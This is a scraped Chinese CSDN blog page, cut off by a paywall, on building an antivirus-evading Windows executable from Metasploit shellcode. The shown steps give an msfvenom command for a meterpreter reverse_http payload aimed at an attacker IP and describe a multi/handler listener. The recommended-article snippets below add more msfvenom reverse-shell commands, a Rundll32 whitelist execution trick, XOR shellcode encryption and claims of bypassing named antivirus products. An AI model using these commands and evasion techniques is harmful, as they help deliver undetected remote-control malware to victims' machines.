使用MSF生成的shellcode打造免杀payload

最新推荐文章于 2024-08-16 11:57:35 发布
最新推荐文章于 2024-08-16 11:57:35 发布
阅读量1.3w 收藏 25
点赞数 4
分类专栏: shellcode 文章标签: shellcode msf 免杀 payload
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mickeymouse1928/article/details/71160027
版权
本文介绍了如何在Kali攻击机上使用msfvenom生成shellcode,然后在Windows 7环境中通过Visual Studio创建Win32控制台项目,将shellcode嵌入并设置项目属性以避免DLL错误,最终编译生成免杀的exe文件。同时,还展示了在Kali上配置msf multi/handler模块进行监听,以便在目标主机执行后能成功回连。
摘要由CSDN通过智能技术生成

环境

1.Kali攻击机IP:192.168.114.140

2.使用win7生成exe

步骤:

使用msfvenom生成shellcode :

msfvenom -pwindows/meterpreter/reverse_http lhost=192.168.114.140 lport=5555 -f c

win7中使用Visual studio创建Win32控制台项目(如果装了gcc,也可以使用gcc编译):

选择空项目

最低0.47元/天 解锁文章
MickeyMouse1928
关注
专栏目录
Kali学习笔记使用msf生成shellcode制作免杀payload
Kind&红衣的博客
08-13 6579
环境:     kali-linux-2018.2-amd.iso       Visual Studio 2017     msfvenom    更新时间:2018年8月13日07:06:43 直接注入的生成方式(一): //生成c格式的后门,-p指定模块,-e 指定编码,-i指定编码次数,-f 输出格式,-b 去除指定代码 root@kali:~# msfvenom -p wi...
通过Python实现Payload分离免杀过程详解
09-16
# 使用MSF生成Shellcode def generate_shellcode(): command = "msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=YOUR_PORT -f python" result = subprocess.check_output(command, shell=True)...
使用shellcode打造MSF免杀payloadshellcode加载技术
jackey3Lin的专栏
10-21 5493
0x00 前言      经常有同学提及MSF payload免杀问题,其实除了Veil之处,还有另一种比较轻巧的方案可以打造免杀payload,那就是shellcode。  0x01 从哪里开始      shellcode是什么,可以去drops搜索学习,但这并不是本文的重点。因为MSF已经为我们提供了shellcode生成功能,接下来我们就拿最常用的payload:reverse
WEB渗透免杀-MSF+shellcode免杀
最新发布
qq_59468567的博客
08-16 435
目前过火绒,不过360,可组合一下 Vs新建c++控制台程序 右键属性-》将MFC的使用选为在静态库中使用MFC 生成c格式shellcode粘贴进remote inject.cpp。生成的py文件使用py2exe编译执行 生成的cs文件使用csc.exe编译执行 生成的cpp文件使用vc6.0编译,去掉预编译头编译执行。正常执行结束进程msbuild会失去会话,以下保存bat执行 获得session后立刻迁移进程。生成项目 能成功上线,并开启calc进程。当前过不了火绒,360动态静态可过。
MSF实战免杀过静态:ShellCode加花指令
xf555er的博客
03-30 1209
第一部分(api_call)是一个通用API调用函数,用于动态查找和调用API。第二部分(reverse_tcp)创建一个反向TCP连接,将本地机器连接到攻击者的监听器。第三部分(recv)负责接收并执行第二阶段Payload。这三部分共同实现了一段完整的Shellcode,用于反向连接攻击者机器并执行远程指令。
木马免杀二)shellcode 学习
Goodric的博客
08-10 1833
shellcode 是一段利用软件漏洞进行执行的机器码, 通常用汇编语言编写并被翻译为十六进制操作码,因常被攻击者用于获取系统的命令终端shell 接口,所以被称为 shellcode。说到获取系统的命令终端shell 接口,shell 是操作系统中提供给用户用于内核交互执行任意系统命令的应用程序。Windows操作系统中的shell 包括 命令提示符cmd 和 powershell 应用程序。Linux操作系统中的 bash shell
python免杀学习
m0_58595840的博客
01-06 456
python免杀bypass学习
使用MSF生成shellcode
weixin_34092455的博客
04-02 1055
使用MSF生成shellcode payloadshellcode的区别 Payload是是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码。因为Payload是包含在ShellCode中的,ShellCode是真正的被输入到存在漏洞的程序中的,并且ShellCode负责把程序的流程最终转移到你的Payload代码中。所以对于一个漏洞来说,ShellCode就...
Kali msf教程
08-24
#### 三、Kali Linux与MSF的结合使用 - **环境配置**: - 安装Kali Linux:可以通过官方ISO镜像制作启动盘安装。 - 安装MSF:在Kali Linux中已经预装了最新版本的Metasploit框架。 - **基本操作**: - 启动MSF...
msf 渗透测试
06-05
4. **msfpayload & msfencode**: 结合使用可以生成并编码payload。 - 示例:生成一个编码后的Windows x64 Meterpreter反向TCP payload: ``` msfpayload windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=...
Python-AV-Evasion:执行shellcode使用python逃避AV检测
05-04
generate.py确实从给定的shellcode(从文件读取或由msfpayload / msfvenom插入)中生成python脚本(与以前的脚本类似),还可以选择添加Hyperion / Veil / 例如AV逃避)。 生成的脚本可以很好地与PyInstaller或类似...
MSF用户指南.docx
06-02
- **payload生成**:根据攻击目的,用户可以生成各种类型的payload,如shellcode,实现远程控制或数据窃取。 - **会话管理**:成功利用后,MSF可管理建立的会话,进行进一步的命令执行、文件传输等操作。 - **后...
metasploit中文使用详解.pdf
08-14
### Metasploit中文使用详解 #### 一、Metasploit简介 Metasploit是一款非常知名的开源安全漏洞检测工具。作为一款免费工具,Metasploit被广泛应用于网络安全领域,特别是用于评估系统安全性的强度。该框架自2003...
十一课:基于白名单Rundll32.exe执行payload第十一季1
08-03
这条命令将使用JavaScript脚本并通过Rundll32.exe调用MSHTML组件执行远程提供的shellcode。 成功后,Metasploit将会显示连接成功的信息: ```plaintext [*] Started reverse TCP handler on 192.168.1.4:53 ...
十一课:基于白名单Rundll32.exe执行payload第十一季.docx
09-15
这涉及到使用msfvenom生成一个DLL格式的payload,如`msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=53 -f dll > Micropoor_Rundll32.dll`,然后在靶机上直接运行...
记一份SQLmap 使用手册小结(二)1
08-03
- 上传独立payload并通过sys_exec()、xp_cmdshell()执行。 - `--os-smbrelay`:利用SMB攻击(如MS08-068)执行Metasploit shellcode。 - `--os-bof`:溢出Microsoft SQL Server 2000和2005的sp_replwritetovarbin...
免杀】异或加密Shellcode免杀绕过火绒、360
z2560088的博客
03-19 2298
msfvenom生成c格式的shellcode 对该shellcode进行异或加密 #include<string> #include <iostream> using namespace std; using std::string; unsigned char buf[] = "\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" "\x8b\x52\x0c\x8b\x52\x14\x0f\xb7.
shellcode免杀之VirtualAlloc函数加载shellcode过杀软
orange777
02-27 1021
go语言木马免杀
免杀入门---shellcode免杀
LvHLong的博客
05-03 5554
前言 本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担。 基础概念 免杀 免杀技术全称为反杀毒技术Anti Anti- Virus简称“免杀”,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。 杀毒软件工作原理 市面上的杀毒软件基本由扫描器、病毒特征库和虚拟机组成,它会把文件放在虚拟机内运行,扫描该文件的特征,包括静态特征、内存特征、行为特征等,通过和病毒特征库对比来判断一个文件是否为恶意文件。安全厂商一直在收集市面上出现的...
shellcode不是一段16进制的机器码吗?你为啥说能直接执行呢?应该是需要先编译成二进制可执行文件吧?msf生成shellcode为什么要区分输出格式?掩日免杀是c格式的shellcode生成器吗?如果换了一个格式的shellcode,掩日免杀还能正常工作吗?
04-29
你说得没错,shellcode是一段16进制的机器码,需要先编译...掩日免杀是一个c格式的shellcode生成器,可以生成多种不同格式的shellcode。如果换了一个格式的shellcode,掩日免杀可能无法正常工作,需要进行相应的修改。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值